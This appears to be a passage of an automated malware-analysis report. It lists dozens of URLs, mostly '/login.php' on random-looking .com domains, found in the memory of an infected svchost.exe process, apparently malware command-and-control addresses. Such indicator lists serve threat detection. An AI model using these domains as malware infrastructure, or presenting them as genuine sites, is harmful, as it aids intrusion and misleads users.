    Source: svchost.exe, 00000002.00000003.1419020654.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1720322684.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1445129038.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682710419.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681527085.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1786991101.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812525410.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2664198427.000000000615D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2657962041.0000000003A23000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812522672.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681533109.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719755728.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1700243441.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654592371.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719650590.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1447072147.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722817064.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677983877.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1417728429.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574575216.00000000029D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqydeb.com/login.php
    Source: svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1991054735.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqydus.com/login.php
    Source: svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575011118.000000000602E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881654799.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580917080.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595800717.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1583773094.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1609355192.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585643847.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1607712523.0000000006035000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqyfah.com/login.php
    Source: svchost.exe, 00000002.00000003.2063505060.00000000029BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqyfub.com/login.php
    Source: svchost.exe, 00000002.00000003.1839598278.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975297183.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841502213.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559111148.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1849105245.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1904366746.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1862569690.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1853453281.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839664919.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1561154923.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881676347.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1554779210.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1876562818.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1572395938.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1560818719.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1553664034.0000000006007000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqynyw.com/login.php
    Source: svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2084205455.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2087743263.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090303553.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662285851.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2086194667.0000000003A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqypuh.com/login.php
    Source: svchost.exe, 00000002.00000003.1547180269.00000000029FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1550239524.00000000029FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1549704357.000000000B453000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975297183.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841502213.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559573077.00000000029FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1904366746.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812525410.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1862569690.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812522672.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1853453281.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1564225122.00000000029FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839664919.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881676347.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1876562818.00000000029BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqyqis.com/login.php
    Source: svchost.exe, 00000002.00000003.2514302068.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2105138614.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090328753.0000000003A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqyres.com/login.php
    Source: svchost.exe, 00000002.00000003.2063505060.00000000029BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqyvys.com/login.php
    Source: svchost.exe, 00000002.00000003.1461641924.0000000002961000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1461024181.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1460509147.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1461420985.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1460237443.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1460531701.0000000002962000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1460382445.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1460343692.00000000060D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1459900883.0000000002959000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatydaw.com/
    Source: svchost.exe, 00000002.00000003.1461641924.0000000002961000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1461024181.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1460509147.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1461420985.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1460237443.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1460382445.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1459900883.0000000002959000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatydaw.com/d
    Source: svchost.exe, 00000002.00000003.1527969887.00000000060F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1481907291.00000000060FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1552047254.00000000060FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1550101575.00000000060F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1464966899.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533636747.00000000060FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatydaw.com/login.php
    Source: svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1991054735.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1597491228.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1609566832.000000000B453000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595800717.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1887219652.00000000029FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1909394304.00000000029FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyfaz.com/login.php
    Source: svchost.exe, 00000002.00000003.1680991545.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682710419.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681533109.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558340925.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2653164909.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654592371.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677983877.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558824372.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559076689.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688061370.0000000003AFF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558638805.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559887806.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1417728429.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574575216.00000000029D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1421183651.0000000006098000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyfus.com/login.php
    Source: svchost.exe, 00000002.00000003.1839598278.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975297183.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841502213.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881654799.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1849105245.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1904366746.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1862569690.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1853453281.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839664919.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1561154923.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881676347.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1876562818.00000000029BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyhub.com/login.php
    Source: svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575011118.000000000602E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1579923926.000000000615C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881654799.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580917080.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1576857106.000000000615A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1576872039.000000000615A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatynes.com/login.php
    Source: svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090328753.0000000003A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatypuz.com/login.php
    Source: svchost.exe, 00000002.00000002.2654281668.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2106241770.00000000029C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2098478160.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2587062256.00000000029C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyrah.com/H
    Source: svchost.exe, 00000002.00000002.2654281668.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2106241770.00000000029C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2098478160.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2587062256.00000000029C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyrah.com/http://gatyrah.com/http://puvygyv.com/H
    Source: svchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2106093549.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2098478160.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558340925.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654165963.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2653164909.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558824372.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559076689.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558638805.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559887806.0000000002956000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyrah.com/login.php
    Source: svchost.exe, 00000002.00000003.1550432575.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1549704357.000000000B453000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559573077.00000000029FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812525410.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812522672.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1564225122.00000000029FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1546749994.00000000008A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyrez.com/login.php
    Source: svchost.exe, 00000002.00000003.2026567354.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2024313127.00000000060F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2024037953.00000000060EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyruw.com/
    Source: svchost.exe, 00000002.00000003.1594664611.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1991054735.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1597491228.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1987963029.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600411612.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975297183.00000000029CF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1887285492.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600322672.000000000B456000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1982680914.00000000029D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyviw.com/login.php
    Source: svchost.exe, 00000002.00000002.2654281668.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2587062256.00000000029C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyvyz.com/http://gatyvyz.com/http://pujyjav.com/http://vojyjof.com/http://lyvytuj.com/http:
    Source: svchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1419020654.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2567044403.0000000003A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1447172965.000000000600D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1418952774.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654165963.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1464966899.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1417728429.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1421183651.0000000006098000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyvyz.com/login.php
    Source: svchost.exe, 00000002.00000003.1527969887.00000000060F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1531530033.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1552047254.00000000060FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533898265.0000000002957000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1526067014.0000000002954000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1550101575.00000000060F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534189667.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533636747.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1526019425.000000000294D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyzys.com/login.php
    Source: svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2653631419.0000000002977000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1669412325.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090328753.0000000003A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyzyw.com/login.php
    Source: svchost.exe, 00000002.00000003.1715978327.00000000060EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719752875.00000000060F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1726087708.00000000060FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygyfex.com/
    Source: svchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1419020654.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722284669.00000000061F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1445129038.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682710419.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090777131.00000000061F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1611037297.00000000061F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2573381767.00000000061F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681533109.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1564448771.00000000061F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654165963.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534063235.00000000061F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799485276.00000000061F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2028541784.00000000061F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2663699181.00000000060FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1599642664.00000000061F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1447072147.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677983877.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003160513.00000000061F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygygin.com/login.php
    Source: svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575011118.000000000602E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881654799.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580917080.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585643847.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1572395938.000000000B452000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygyjuj.com/login.php
    Source: svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839598278.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1849105245.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1850899748.0000000003A58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1572395938.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559127231.000000000B458000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1560818719.000000000B444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygylax.com/login.php
    Source: svchost.exe, 00000002.00000003.2069850659.00000000060EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygymod.com/
    Source: svchost.exe, 00000002.00000003.1680991545.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682710419.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1423883951.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681527085.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1418399086.00000000060CE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1786991101.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2657962041.0000000003A23000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681533109.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1481907291.00000000060FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1700243441.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654592371.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722817064.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677983877.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574575216.00000000029D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1421183651.0000000006098000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygymoj.com/login.php
